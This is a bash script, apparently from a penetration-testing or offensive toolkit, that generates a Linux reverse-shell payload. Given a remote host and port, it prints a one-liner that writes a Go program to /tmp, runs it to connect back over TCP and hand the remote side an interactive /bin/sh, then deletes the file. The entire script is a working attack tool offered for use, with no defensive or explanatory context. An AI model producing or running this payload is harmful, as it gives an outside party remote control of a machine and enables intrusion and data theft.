
#!/bin/bash

function Craft_linux_golang_reverse_shell(){

        if [ -z "$1" ] || [ -z "$2" ]
        then
                printf "Auto-gen Linux golang reverse tcp shell\n"
                printf "Usage bash linux_golang-reverse-tcp <rhost> <rport>\n"
                exit
        fi

        rhost="$1"
        rport="$2"

        printf "\n"
        printf "echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"$rhost:$rport\");cmd:=exec.Command(\"/bin/sh\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go"
        printf "\n\n[\e[0;32m+\e[0m] Payload created.\n"

}

Craft_linux_golang_reverse_shell "$1" "$2"
